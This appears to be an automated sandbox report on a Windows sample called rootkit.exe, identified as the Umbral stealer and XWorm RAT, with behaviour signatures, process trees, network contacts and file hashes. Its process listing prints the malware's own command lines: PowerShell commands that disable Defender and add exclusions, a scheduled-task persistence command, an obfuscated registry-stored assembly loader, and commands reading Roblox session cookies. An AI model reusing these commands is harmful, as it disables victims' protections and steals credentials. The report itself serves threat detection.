Malware Analysis Report

2024-10-10 09:55

Sample ID: 240708-wdlndatbpf
Target: rootkit.exe
SHA256: f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc
Tags: umbral xworm evasion execution persistence rat spyware stealer trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

SHA256: f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc

Threat Level: Known bad

The file rootkit.exe was found to be: Known bad.

Malicious Activity Summary

umbral xworm evasion execution persistence rat spyware stealer trojan

Detect Xworm Payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Modifies security service

Xworm

Detect Umbral payload

Umbral

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Drops startup file

Reads user/profile data of web browsers

Executes dropped EXE

Checks BIOS information in registry

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Detects videocard installed

Modifies registry class

Checks processor information in registry

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

Modifies data under HKEY_USERS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-07-08 17:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-07-08 17:48
Reported: 2024-07-08 17:51
Platform: win7-20240705-en
Max time kernel: 150s
Max time network: 95s

Command Line

winlogon.exe

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP C:\Windows\System32\svchost.exe N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2256 created 432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Software\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\ProgramData\\www.DeadSec0000000000-obfusecator.exe" C:\Users\Admin\AppData\Local\Temp\rootkit.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2256 set thread context of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf C:\Windows\system32\svchost.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0f6bb145fd1da01 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2700 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 2700 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 2700 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 2700 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 2700 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 2700 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 2700 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 2700 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 2700 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 2356 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 2700 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 2700 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 2700 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 2356 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1696 wrote to memory of 2256 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 1696 wrote to memory of 2256 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 1696 wrote to memory of 2256 N/A C:\Windows\system32\taskeng.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
PID 2356 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2256 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2256 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2256 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2256 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2256 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2256 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2256 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2256 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2256 wrote to memory of 1744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2904 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2904 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2904 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1744 wrote to memory of 432 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 1744 wrote to memory of 476 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\services.exe
PID 1744 wrote to memory of 488 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 1744 wrote to memory of 496 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsm.exe
PID 2356 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2356 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1744 wrote to memory of 604 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1744 wrote to memory of 680 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1744 wrote to memory of 752 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1744 wrote to memory of 812 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1744 wrote to memory of 840 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1744 wrote to memory of 964 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1744 wrote to memory of 108 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1744 wrote to memory of 1016 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 1744 wrote to memory of 1036 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1744 wrote to memory of 1108 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\taskhost.exe
PID 1744 wrote to memory of 1172 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\Dwm.exe
PID 1744 wrote to memory of 1232 N/A C:\Windows\System32\dllhost.exe C:\Windows\Explorer.EXE
PID 1744 wrote to memory of 1288 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe
PID 1744 wrote to memory of 1628 N/A C:\Windows\System32\dllhost.exe C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
PID 1744 wrote to memory of 620 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\wbem\wmiprvse.exe
PID 1744 wrote to memory of 2740 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1744 wrote to memory of 2868 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\sppsvc.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\services.exe

C:\Windows\system32\services.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

C:\Windows\system32\sppsvc.exe

C:\Windows\system32\sppsvc.exe

C:\Users\Admin\AppData\Local\Temp\rootkit.exe

"C:\Users\Admin\AppData\Local\Temp\rootkit.exe"

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

"C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"

C:\Users\Admin\AppData\Local\Temp\Modify.exe

"C:\Users\Admin\AppData\Local\Temp\Modify.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Modify.exe'

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

"C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {993F2002-18FA-436D-B11F-81CE7F5E0440} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](119)+'w'+'w'+''+[Char](115)+'t'+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{d15b2779-7884-4cbb-a64a-f2b5142ac124}

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 142.250.200.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

MD5 737b2d60dc5d475685b65f5c288e00c0
SHA1 144ba7647d8609abe4aab74d4f191e2c594dd55a
SHA256 69c3458a319518d10939633f7421eb833c8c9c904f989f0ef75a572a59a1f084
SHA512 96a22774e1b5c22d9d4114a8f22f1f75cf2edc5970442e1b1e5eabfc70a922d3f4a5e5d8c93150f50ef3da45b241745f861f1d00b306c11707097495b84ecee6

C:\Users\Admin\AppData\Local\Temp\Modify.exe

MD5 9259d8aef8f52e8ff4fa082c0074c9b0
SHA1 88abb68a5632812be3c18e0c740e3818d9501b3e
SHA256 45d4033eeaa6aa420a644c3eb2d0ef659320c9a13e22d1d16930c807847203db
SHA512 9cb06d4026a53208e80865cdb21d79e40d418518a168680537cafa08f1c295094238014ba35c2b7794a773ac2dc480b01cf5811d5b1e60bf911d7a6d03985ede

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

MD5 22d120454dd38d7f1a3f1cd0eb497f95
SHA1 4c11a082bf8e64b21310b959821a9f7324aa8107
SHA256 6fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c
SHA512 1552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 26ebfd1c75ffead44f160c4a5e73d96e
SHA1 8d0a378aefa87d4c2fd4a1ea24e553789be1f02d
SHA256 8e37b54f1de33de46256a947db93ddbcce64760b44f0ff73e2e73bd6aa4ad885
SHA512 2fc75e4180d55119ef3ff3301fd085b595975fb7b1ed579e50f3b024deff7fa2e6e191732995a837e88339d7e66eeaa48a5ab774c68ac4235fe065be85cd0bb3

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 b0a17851316b39d3872d89ba00a56cfe
SHA1 cad7bb3fd0701a969451d979fd6325383ec0caf0
SHA256 e999f4104aae26d0f7bd9c088db3e36dc0413b554bdd39ac3ad2006f5cc50a1e
SHA512 54af72d60dcecf61889d51ec8b11d242b05ed0674dccc17234b058036ecdccd17483f24f51e98a5573fa86663137b1cb0372227687d42941da224fe328820d6d

Analysis: behavioral2

Detonation Overview

Submitted: 2024-07-08 17:48
Reported: 2024-07-08 17:51
Platform: win10v2004-20240704-en
Max time kernel: 150s
Max time network: 131s

Command Line

winlogon.exe

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3688 created 616 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Umbral

stealer umbral

Xworm

trojan rat xworm

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Modify.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\rootkit.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\www.DeadSec0000000000-obfusecator = "C:\\ProgramData\\www.DeadSec0000000000-obfusecator.exe" C:\Users\Admin\AppData\Local\Temp\rootkit.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Tasks\XClient C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3688 set thread context of 3652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
